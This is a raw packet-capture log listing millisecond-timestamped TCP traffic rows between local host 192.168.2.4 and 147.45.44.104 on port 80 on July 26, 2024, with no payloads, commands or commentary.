Jul 26, 2024 18:56:48.590853930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.590877056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.591255903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591268063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591278076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591289043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591300011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.591331005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.591345072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591356993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591367006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591378927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591379881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.591391087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.591403008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.591428995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592084885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592097044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592108011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592119932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592129946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592133999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592144012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592152119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592155933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592166901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592168093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592178106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592189074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592195988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592200994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592212915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.592216969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592233896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.592250109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593064070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593075991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593086958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593099117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593108892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593111038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593120098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593131065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593133926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593147039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593151093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593162060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593168020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593174934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593185902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593195915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593197107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593206882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.593219042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593233109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.593255043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594017982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594029903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594039917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594049931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594060898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594062090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594082117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594088078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594095945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594101906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594109058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594120979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594126940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594149113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594153881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594165087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594175100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594177008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594193935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594217062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594693899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594736099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594902039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594916105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594926119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594942093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594949961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594954014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594964981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594973087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.594978094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594988108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.594989061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595000029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595010996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595015049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595025063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595036983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595037937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595051050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595053911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595062971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595069885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595096111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595899105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595930099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595940113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595951080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595961094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595968008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595973015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595983982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.595985889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595999002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.595999956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596010923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596021891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596021891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596035004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596045971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596049070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596059084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596060991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596071959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596085072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596108913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596857071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596868038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596878052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596889019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596899986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596899986 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596911907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596923113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596924067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596935034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596939087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596947908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596960068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596965075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596971989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596985102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.596987963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.596998930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597007036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597022057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597044945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597745895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597759008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597775936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597785950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597793102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597796917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597807884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597810030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597821951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597832918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597832918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597842932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597850084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597853899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.597878933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.597899914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598279953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598292112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598323107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598423004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598433971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598444939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598455906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598457098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598469019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598480940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598480940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598493099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598504066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598505020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598515987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598520994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598529100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598539114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598540068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598551035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598562956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598563910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.598587990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.598602057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599378109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599390030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599400997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599412918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599423885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599430084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599436045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599447012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599448919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599458933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599464893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599472046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599483013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599483967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599495888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599507093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599508047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599520922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599530935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599534988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.599546909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.599570036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600399017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600409031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600419998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600431919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600440979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600440979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600454092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600466013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600476027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600497961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600506067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600506067 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600512981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600517035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600527048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600539923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600545883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600552082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600563049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.600578070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600586891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.600613117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601089001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601099968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601113081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601130962 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601149082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601150990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601162910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601175070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601183891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601186991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601210117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601233006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601711988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601722956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601735115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601746082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601756096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601758003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601768970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601778984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601783991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601790905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601800919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601805925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601813078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601819992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601824045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601835012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601835966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601860046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601862907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601871967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601883888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601885080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601897955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.601907015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.601933956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602652073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602663994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602675915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602686882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602698088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602699995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602710009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602713108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602722883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602735043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602741957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602746010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602756977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602760077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602768898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602778912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602780104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602792978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602799892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602806091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602814913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602821112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602833033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602842093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602845907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.602873087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.602883101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603745937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603758097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603766918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603777885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603789091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603796005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603800058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603811026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603815079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603822947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603832006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603836060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603847980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603849888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603858948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603869915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603872061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603882074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603894949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603897095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603905916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603914976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603919029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.603929043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.603955030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604357958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604370117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604379892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604393005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604419947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604588032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604599953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604609966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604619980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604629993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604629993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604641914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604648113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604657888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604664087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.604664087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.604675055 CEST	80	49757	147.45.44.104	192.168.2.4
